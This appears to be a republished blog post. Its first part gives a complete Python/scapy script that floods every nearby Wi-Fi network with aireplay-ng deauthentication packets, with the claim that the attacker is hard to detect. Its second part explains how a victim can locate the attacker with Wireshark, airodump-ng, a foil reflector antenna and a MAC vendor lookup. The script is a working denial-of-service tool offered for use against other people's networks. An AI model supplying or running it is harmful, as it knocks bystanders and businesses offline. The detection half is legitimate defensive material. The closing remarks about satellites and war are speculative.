How to burn down any wireless network around you and how to find out the exact location of a wireless laptop I made a program which will monitor the air for connections between wireless hot spots and hosts, if the program will find a connection it will send a deauth packet which will disconnect the client, this goes at such a high speed that clients will have no chance to establish a proper connection to the router. #!/usr/bin/python try: import sys,os from scapy.all import * except: print "[-] Could not import all needed things, be sure you have Python, aircrack-ng and scapy installed" sys.exit(0) def deauth_flood(p): if p.haslayer(Dot11): mac = {} mac["ap"]=p.sprintf("%Dot11.addr1%") mac["station1"]=p.sprintf("%Dot11.addr2%") if not mac["ap"]=="ff:ff:ff:ff:ff:ff" and mac["station1"]!="None": os.system("aireplay-ng -0 1 -a "+mac["ap"]+" -c "+mac["station1"]+" "+sys.argv[1]+" &")# Remove " &" for a slower attack rate. def instructions(): print "== WLAN blackout - written by Jelmer de Hen - published at http://h.ackack.net ==\n\ninstructions:\n" print "python "+sys.argv[0]+" [iface]" print "python "+sys.argv[0]+" mon0" if len(sys.argv)>1: print "[+] Searching for packets..." sys.exit(sniff(iface=sys.argv[1],prn=deauth_flood)) else: sys.exit(instructions()) Use at your own risk, you won’t be detected too fast since you send entirely spoofed packets but with the right equipment and skills on the side of the victim side he will be able to do it, normally when these kinds of attacks are launched at company’s they will have to ask the ISP to come with a special device which will track down the exact location of the device. But what when you are being targeted by this attack? First you have to know that this might be hard to detect since it can be exploited from very custom locations, think about: - Attacker is at 1 location not too far away; for example in a car - Moving attacker walking around with a laptop in bag - Infected/botted computer(s) of any kind, could even be your heat pump or light system control system in this case - Malicious pineapples - Phones (like the iphone) - Satellite dish pointed to you - Infected satellite Understand that it is impossible to counter some of these attacks but an iphone or car should be tracable. Requirements: - Movable Linux based PC with wireless capability; if you don’t have a *nix system you can download backtrack for free, burn it to a DVD and boot from it; in the case your PC can’t boot DVD’s you can go for an Ubuntu live CD or another distribution, booting from these CD’s won’t change anything to your actual system. - Wireshark (free) - Aircrack-ng (free) optional: - poitable antenna - thin foil - scissors - glue - cardboard (or other hard bendable material) Why thin foil, scissors and cardboard? To locate the attacker; it would be ideal to have a parabolic reflector to decrease the time it will take for localizing the attacker. You can make the windsurfer or be creative and make something custom, the idea is that you can eliminate 1 side of the antenna and reflect that to the side where you point it to increase your range and elimate the chance of the attacker being behind the antenna. When you have all requirements you can get started, move in the middle of the deauth packets storm and turn on Wireshark & airodump-ng. In wireshark apply “radiotap.length==13? as filter (captures all deauth packets) and make a list of all hosts you see in airodump-ng. Look at the rate with which you capture deauth packets and look in the bottom fields for the connections between routers and hosts, look at the PWR levels here. Now move the windsurfer 90 degrees and look at the rate at which you capture and the deauth packets now, decide if it was less or more, redo this progress until you find the location at where the deauth packets have the highest rate, when being in a building it would be smart to also look under and above you. Once you localized the location where the most deauth packets came from move your PC closer to that source, then redo the process of monitoring where the packets come from and look at aircrack-ng. Once you are very very close you can determine which MAC address is doing this by looking it up in airodump-ng, this machine at that moment will have a very low PWR (0 until -50 is good enough). Now run this command in bash to determine the manufacture of the card so you know something more about the attacking machine. cat `locate manuf` | grep 00:11:22 Replace the latest part with the first part of the MAC address for example when you found the MAC address 55:44:33:22:11:00 then 55:44:33 is the part you will need. Please note that this MAC address can be spoofed and/or not broadcasting so you won’t be able to see it, then you have to do it all with Wireshark and determine where the most packets come from. After you did all this you can just grab that malicious pineapple and smash it as hard as you can. This cheap attack vector can form a high risk level during war, when properly exploited an army can attack an entire city by pointing a satellite dish in their direction or think about an attacker which takes over a satellite and reprograms it to be able to do these kind of attacks, with these techniques it will be hard to prevent those attacks unless we will make big thin foil shields around our city’s. I gave you some basic solutions to find the attacker but this antenna detection way works great also for other means, i once tried this on a friend of mine in my old school to find out his location, it was a multi floor school building and i had no idea where he was, within 15 minutes i found him. //care-l testeaza ? How to burn down any wireless network around you and how to find out the exact location of a wireless laptop